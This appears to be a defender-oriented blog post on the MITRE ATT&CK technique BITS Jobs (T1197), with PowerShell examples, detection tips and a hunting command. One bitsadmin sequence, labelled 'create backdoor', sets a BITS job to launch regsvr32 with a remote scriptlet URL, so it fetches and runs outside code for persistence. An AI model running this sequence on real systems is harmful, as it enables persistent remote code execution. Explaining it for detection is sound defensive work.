100 Days of MITRE ATT&CK — #1

* Most probably I’ll not publish a new post everyday, but I’ll publish at least 100 posts within this series. My aim is finding motivation to learn certain techniques, and while doing this of course the original content from MITRE will be my guide, I’ll try to create pragmatic posts for defenders.

BITS Jobs — T1197 — Defense Evasion, Persistence

Windows Background Intelligent Transfer Service (BITS), just from the name it sounds pretty useful for both legitimate and malicious usage. It is a file transfer mechanism which is commonly used by applications (updaters, messengers)that operate in the background by using idle bandwidth without interrupting other networked applications. In order to do file transfers, BITS jobs are used.

BITS jobs can be created and managed through Powershell or BITSAdmin tool.

To prevent against its malicious usage, limiting BITS interface access to specific users/groups, limiting network access to only legitimate BITS traffic(baselining needed), and reducing the default BITS job lifetime to prevent persistency and evasion can be recommended.

For detecting malicious BITS activity, we need to monitor the creation of BITS jobs. And for threat hunting and investigating, checking the BITS job database can be very useful. First let’s put some usage examples.

Powershell

Start-BitsTransfer -Source C:\clientsourcedir\*.txt ` -Destination c:\clientdir\ -TransferType Download

— — — — — — — — — — — — — — — — — — — — — — — — — -

Import-CSV filelist.txt | Start-BitsTransfer -TransferType Upload

— — — — — — — — — — — — — — — — — — — — — — — — — -

$Job = Start-BitsTransfer -Source https://Server1.TrustedDomain.com/File1.zip `
-Destination d:\temp\downloads\ -Asynchronous

while (($Job.JobState -eq “Transferring”) -or ($Job.JobState -eq “Connecting”)) `
{ sleep 5;} # Poll for status, sleep for 5 seconds, or perform an action.

Switch($Job.JobState)
{
“Transferred” {Complete-BitsTransfer -BitsJob $Job}
“Error” {$Job | Format-List } # List the errors.
default {“Other action”} # Perform corrective action.
}

In the example above, source file info and destination server information is located in the file. The file should be aligned with the syntax in this link.

*As usual suspects, Start-BitsTransfer and Get-BitsTransfer (used for enumerating the active BITS transfers) are two main commands to check on PowerShell logs.

Using WinRM PowerShell Commands

# Get the credentials to connect to the remote client computer
$cred = Get-Credential
$result = Invoke-WsmanAction -Action CreateJob –Resourceuri wmi/root/microsoft/bits/BitsClientJob `
–Valueset @{DisplayName=”TestJob”; RemoteUrl=”https://Server01/servertestdir/testfile1.txt"; LocalFile=”C:\clienttestdir\testfile1.txt”;Type=0} `
–ComputerName Client1 -Credential $cred

*Checking *BitsClientJob* in the URI path of PowerShell commands can be another way of detection.

Using WMI PowerShell Commands

$cred = Get-Credential
$bcs = Get-WmiObject -Namespace “root\Microsoft\BITS” -Class “BITSCompactServerUrlGroup” `
-List -ComputerName Server1 -Credential $cred

*Checking BITS provider classes like *BitsCompactServerUrlGroup* in the PowerShell commands also can be a way of detecting. Another BITS provider classes are *BitsClientFile*, and *BitsClientJob*.

Installation of BITS Compact Server

PS C:\> Import-Module ServerManager
PS C:\> Add-WindowsFeature BITS-Compact-Server

Success Restart Needed Exit Code Feature Result
— — — — — — — — — — — — — — — — — — — — — — —
True No Success {Compact Server}

• Again in the PowerShell commands, check BITS-Compact-Server command.

By using BitsAdmin command-line tool

# create backdoor

bitsadmin /create backdoor

bitsadmin /addfile backdoor %comspec% %temp%\cmd.exe

bitsadmin.exe /SetNotifyCmdLine backdoor regsvr32.exe “/u /s /i:https://raw.githubusercontent.com/3gstudent/SCTPersistence/master/calc.sct scrobj.dll”

bitsadmin /Resume backdoor

• From Windows process creation logs, bitsadmin.exe process name and combination of Create, Transfer parameters can help us on detecting.

And during threat hunting or investigation, the following command can be used to list and check active BITS jobs. bitsadmin /list /allusers /verbose

This technique is used by Leviathan and APT41 groups to download payloads and additional tools.